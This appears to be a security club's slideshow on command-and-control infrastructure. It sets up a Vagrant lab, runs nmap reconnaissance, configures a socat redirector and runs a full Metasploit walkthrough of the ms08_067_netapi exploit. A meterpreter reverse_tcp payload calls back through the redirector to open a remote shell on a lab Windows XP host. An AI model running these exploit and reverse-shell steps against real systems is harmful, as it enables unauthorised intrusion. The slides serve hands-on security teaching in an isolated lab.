orgsync.com/79368/

C2 Intro

First Vagrant!

 

wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -O Vagrantfile
curl https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -o Vagrantfile
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile
vagrant up

Learning from others

Visualization

House keeping...

  • fixing windows
    • check - 
    • fix
    • verify

 

 

  • setup redir
vagrant ssh winxp
ipconfig
vagrant ssh redir
sudo socat TCP4-LISTEN:443,fork TCP4:192.168.55.2:443

Recon!

  • Vagrant commands
    • see all vms

 

  • Now Kali
vagrant global-status
vagrant ssh kali
ifconfig
nmap -sT -O 192.168.55.0/24 -oA initial-network
ls

Recon

Exploitation - metasploit

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp         # This is the payload I set
show options                                        # This shows all the options for the payload and exploit
set RHOST 192.168.55.3                              # The host you are attacking
set LHOST 192.168.55.4                              # The external IP that the payload should connect to
set LPORT 443                                       # External port that the payload will connect to
set ReverseListenerBindAddress 192.168.55.2         # The internal IP address of the kali box that's being NAT'd
set ReverseListenerBindPort 443
set ExitOnSession false                             # Don't stop the handler once a session is established (allows you to receive multiple sessions for a handler)
exploit -j -z                                       # Start the exploit as a job. Do not automatically interact with new sessions.

## after you have your session do this to see and interact with it.
sessions -l
# connect to whatever your session number is that displays below
sessions -i 1
# to interact with your exploited host
shell
# to show that the metasploit module isn't connected to your machine
netstat

C2 infrastructure

By 49th Security Division

C2 infrastructure

  • 851